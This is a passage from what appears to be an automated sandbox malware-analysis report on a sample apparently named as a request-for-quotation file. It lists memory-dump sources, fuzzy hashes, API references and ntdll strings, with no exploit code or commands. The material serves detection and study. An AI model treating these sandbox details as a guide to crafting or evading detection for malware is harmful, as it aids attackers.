                                                                                      • Opcode Fuzzy Hash: 76bd7e45e7d79707648f44085421f53d23733e2e605ba6fcf7ff0fa4300df735
                                                                                      • Instruction Fuzzy Hash: C590023234140103D140715854186065005E7F2341F55D012E0414555CDB2589565322
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5514ef60044d5db5b72c731d987cc8d93624f0ec8cf4bf9e126722cdef486d68
                                                                                      • Instruction ID: 3f40ff2186eb0b3118fe3547cb646ec23860cf4eaa9c2dc9d86e9ce03ad62fc0
                                                                                      • Opcode Fuzzy Hash: 5514ef60044d5db5b72c731d987cc8d93624f0ec8cf4bf9e126722cdef486d68
                                                                                      • Instruction Fuzzy Hash: F7900232282442535545B15844045075006A7F1281795C013A1414951CC7369956D721
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dae98d0e9979b425e4fbb0220dea5929027b32561bccbe5819996f072b935d7f
                                                                                      • Instruction ID: 234f9c0f5eb1f00dc888dc03eb60505169b60423951cfd874bbc2da448afdaa7
                                                                                      • Opcode Fuzzy Hash: dae98d0e9979b425e4fbb0220dea5929027b32561bccbe5819996f072b935d7f
                                                                                      • Instruction Fuzzy Hash: 0390023228140503D141715844046061009A7E1281F95C013A0424555EC7658B56AB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 54a8b8f7a99765b2f152131ce415c889339ee0dd9017cec5246a83014eecbfc6
                                                                                      • Instruction ID: 49ca4578bd164ce9f12869e0504d1a10231d34a48d045f889e8236664275aa33
                                                                                      • Opcode Fuzzy Hash: 54a8b8f7a99765b2f152131ce415c889339ee0dd9017cec5246a83014eecbfc6
                                                                                      • Instruction Fuzzy Hash: 2290023224140943D10071584404B46100597F1341F55C017A0124655DC725C9517621
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01a26002031fe4394ee945867072fdd7a489fc7802efb4991f43c4df9d3d2678
                                                                                      • Instruction ID: f3367611d60df3fecff0c03fd2bde337355448ef26fc3393805792262f6ae187
                                                                                      • Opcode Fuzzy Hash: 01a26002031fe4394ee945867072fdd7a489fc7802efb4991f43c4df9d3d2678
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: ___swprintf_l
                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                      • API String ID: 48624451-2108815105
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014346FC
                                                                                      • Execute=1, xrefs: 01434713
                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01434742
                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01434655
                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01434725
                                                                                      • ExecuteOptions, xrefs: 014346A0
                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 01434787
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                      • API String ID: 0-484625025
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-$0$0
                                                                                      • API String ID: 1302938615-699404926
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01437B7F
                                                                                      • RTL: Resource at %p, xrefs: 01437B8E
                                                                                      • RTL: Re-Waiting, xrefs: 01437BAC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 0-871070163
                                                                                      • Opcode ID: e95c1e423d56ba8b690dc30749ebc9e8938bae4ab17fee4e0628d80bae91ea5b
                                                                                      • Instruction ID: fbaa162d920293532e7ef6232d947aff867dc63902536ff5206c91e6af927d59
                                                                                      • Opcode Fuzzy Hash: e95c1e423d56ba8b690dc30749ebc9e8938bae4ab17fee4e0628d80bae91ea5b
                                                                                      • Instruction Fuzzy Hash: CE4103717007028FD725CE29CC40B6BB7E5EF98715F100A2EEA9A9B790DB31E4098B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0143728C
                                                                                      Strings
                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01437294
                                                                                      • RTL: Resource at %p, xrefs: 014372A3
                                                                                      • RTL: Re-Waiting, xrefs: 014372C1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                      • API String ID: 885266447-605551621
                                                                                      • Opcode ID: aa813729ae26e480f27e7ef5369d9ff8d94baa68479ce467fb3d1a224a9d121f
                                                                                      • Instruction ID: 604d8b4dc88ea2e04835f84dd9f4ee08044e965b61c8c802c1ffa3793888e98a
                                                                                      • Opcode Fuzzy Hash: aa813729ae26e480f27e7ef5369d9ff8d94baa68479ce467fb3d1a224a9d121f
                                                                                      • Instruction Fuzzy Hash: 304105B1700206ABD711CF29CC41F66B7A5FB98715F10061EFA95AB790DB31E8468BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-
                                                                                      • API String ID: 1302938615-2137968064
                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction ID: aeedf965bfa74229ea473a4f71cae366d193c0645b771589983cbcd5cb05b547
                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction Fuzzy Hash: F291C470E002069ADB26DF6FC8906BFBBA5AF44322F14453FE995A73E0D730AD418752
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.1927402660.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_1390000_RFQ 0400-ENPI-RQMA.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: fcac658b984ada1489a73dd7d43fea15a76df4e45b7efe8a35d2f3395b8f6ce8
                                                                                      • Instruction ID: f7c1838f3a699836aeeeb315a002529005520859321a142c3b2ff635a95d96d3
                                                                                      • Opcode Fuzzy Hash: fcac658b984ada1489a73dd7d43fea15a76df4e45b7efe8a35d2f3395b8f6ce8
                                                                                      • Instruction Fuzzy Hash: E1811B72D002699BDB35CB54CC45BEABBB8AB48714F0141EAEA19B7290D7705E85CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:0.1%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:23
                                                                                      Total number of Limit Nodes:1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b2f0c765446f32031cf88b1e0ed6beacc8b847b3b74046634a661f43da951c0b
                                                                                      • Instruction ID: d6a00159de13e3c5da6c5974ccf79255e443c656af57428682e895e2da413453
                                                                                      • Opcode Fuzzy Hash: b2f0c765446f32031cf88b1e0ed6beacc8b847b3b74046634a661f43da951c0b
                                                                                      • Instruction Fuzzy Hash: 6D900431705C0413D144F15C4DC45474005D7F4701F55D011F0435554CCF15CF575371
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 28dd05a2db7237ee6eed4d434289e1828886f7553815526a6b3d60100bbb5388
                                                                                      • Instruction ID: 0c480668f04ac46e948b79e2841c17db9c45c9915bb762d709a74cd9af379c8f
                                                                                      • Opcode Fuzzy Hash: 28dd05a2db7237ee6eed4d434289e1828886f7553815526a6b3d60100bbb5388
                                                                                      • Instruction Fuzzy Hash: 2B900471701D04434144F15C4D044077005D7F57013D5D115F0555570CC71DCD55D37D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 6 31d2b60-31d2b6c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 88f2c61cc71ce36b2d5cd86c5ea7d18a59ed9c67d9450edf7e51e189a77b1846
                                                                                      • Instruction ID: 2b7920d0418d3bf954549324a161d02124e909a1b5d6c921bd4ee7f43d055fd0
                                                                                      • Opcode Fuzzy Hash: 88f2c61cc71ce36b2d5cd86c5ea7d18a59ed9c67d9450edf7e51e189a77b1846
                                                                                      • Instruction Fuzzy Hash: C6900261202804034109B1584514616400A87E4601B55D021E1015590DC72689916125
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 7 31d2ba0-31d2bac LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 7a64bbe26419d7412c5c9b1bb3507967609a12ec44812c705ca1760b1cdfbff8
                                                                                      • Instruction ID: 322650276d8a8504e30df95ccd9974720aaca6611f4a52a0181ac4a3a0c5ef76
                                                                                      • Opcode Fuzzy Hash: 7a64bbe26419d7412c5c9b1bb3507967609a12ec44812c705ca1760b1cdfbff8
                                                                                      • Instruction Fuzzy Hash: 5690023160580C03D154B1584514746000587D4701F55D011A0025654D87568B5576A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 9 31d2bf0-31d2bfc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2dd1df815af5e678d9bc93fecfd2db77d95ce7da52ad7a49c7e5d2fea0314d85
                                                                                      • Instruction ID: ff3153612c95c9bf7418793e8359072ccd65556e1483a6aa838921a4b5bac87d
                                                                                      • Opcode Fuzzy Hash: 2dd1df815af5e678d9bc93fecfd2db77d95ce7da52ad7a49c7e5d2fea0314d85
                                                                                      • Instruction Fuzzy Hash: AA90023120180C03D184B158450464A000587D5701F95D015A0026654DCB168B5977A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 8 31d2be0-31d2bec LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 34d7b59cd2d075cc7a029632e3c78e6beb477400f147b1029f8c5f557b79d72e
                                                                                      • Instruction ID: bdec1e244da58b3a3625e439212c3c975b356dd66d414e746c8ab3fb8236b27f
                                                                                      • Opcode Fuzzy Hash: 34d7b59cd2d075cc7a029632e3c78e6beb477400f147b1029f8c5f557b79d72e
                                                                                      • Instruction Fuzzy Hash: 8390023120584C43D144B1584504A46001587D4705F55D011A0065694D97268E55B661
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4 31d2ad0-31d2adc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: ce98c26bb034806eacbec305b06f686f12d1d4d503642377dbdc0e1f06c8bcd5
                                                                                      • Instruction ID: a3bf62f55b6bd452146dfef60fcb90e7e840930dc897198424ae9051227b9188
                                                                                      • Opcode Fuzzy Hash: ce98c26bb034806eacbec305b06f686f12d1d4d503642377dbdc0e1f06c8bcd5
                                                                                      • Instruction Fuzzy Hash: 2B900435311C0403010DF55C07045070047C7DD751355D031F1017550CD733CD715131
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 5 31d2af0-31d2afc LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: bcc652ef63fd5fb355f325c93965c827113f0df9b000a56a1c82fc1cb10cdc9f
                                                                                      • Instruction ID: d0a0490889babb543d6a479968d5b6338d655e256c51e332fea0306a0e2488cd
                                                                                      • Opcode Fuzzy Hash: bcc652ef63fd5fb355f325c93965c827113f0df9b000a56a1c82fc1cb10cdc9f
                                                                                      • Instruction Fuzzy Hash: 11900225221804030149F558070450B044597DA751395D015F1417590CC72289655321
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: ad6c8f3448c676b904baa4dc0feb353d3423d3e64e6dc431d0f121283e1f4475
                                                                                      • Instruction ID: 4cbbe993c7a0077781106531c9a9897c4ea17a588e69793899a7717707800e0e
                                                                                      • Opcode Fuzzy Hash: ad6c8f3448c676b904baa4dc0feb353d3423d3e64e6dc431d0f121283e1f4475
                                                                                      • Instruction Fuzzy Hash: DD90026134180843D104B1584514B060005C7E5701F55D015E1065554D871ACD526126
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: e831d71eff7b1468f8502effa1aa94c68b22333f68fdb7db7eb5f109efa11173
                                                                                      • Instruction ID: 9ec5e9b26d7c2038dcf86520956d5f998cbb815199630204263ca2110021ff96
                                                                                      • Opcode Fuzzy Hash: e831d71eff7b1468f8502effa1aa94c68b22333f68fdb7db7eb5f109efa11173
                                                                                      • Instruction Fuzzy Hash: 42900221601804434144B16889449064005ABE5611755D121A0999550D875A89655665
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 393ed5c2a52aa5e6e134bea70566524df962e42d21f3ec2709e8cca9f2c13da3
                                                                                      • Instruction ID: 3b558277d715a7d3bd22ec889b697d3eb2ebe74f45de585988536bfc94dd8190
                                                                                      • Opcode Fuzzy Hash: 393ed5c2a52aa5e6e134bea70566524df962e42d21f3ec2709e8cca9f2c13da3
                                                                                      • Instruction Fuzzy Hash: 00900221211C0443D204B5684D14B07000587D4703F55D115A0155554CCB1689615521
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 17 31d2e80-31d2e8c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a9af7557d3c00d2883684051a3acf0eb6737659895cb0df68520ad80a6988b0d
                                                                                      • Instruction ID: 4322f083587ca7e263fd9dbd06853270cdc16840cb86d2a7029bc46ad92c60b7
                                                                                      • Opcode Fuzzy Hash: a9af7557d3c00d2883684051a3acf0eb6737659895cb0df68520ad80a6988b0d
                                                                                      • Instruction Fuzzy Hash: AD90022160180903D105B1584504616000A87D4641F95D022A1025555ECB268A92A131
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 67718aec50b472001d249e41515a592ad278bcc363435035a6a7ddd4267a4ddd
                                                                                      • Instruction ID: 448fb4461873297abbce62fb04fa9663fe237b27eda2032a1d239e312509b951
                                                                                      • Opcode Fuzzy Hash: 67718aec50b472001d249e41515a592ad278bcc363435035a6a7ddd4267a4ddd
                                                                                      • Instruction Fuzzy Hash: 0C900261201C0803D144B5584904607000587D4702F55D011A2065555E8B2A8D516135
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 13 31d2d10-31d2d1c LdrInitializeThunk
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
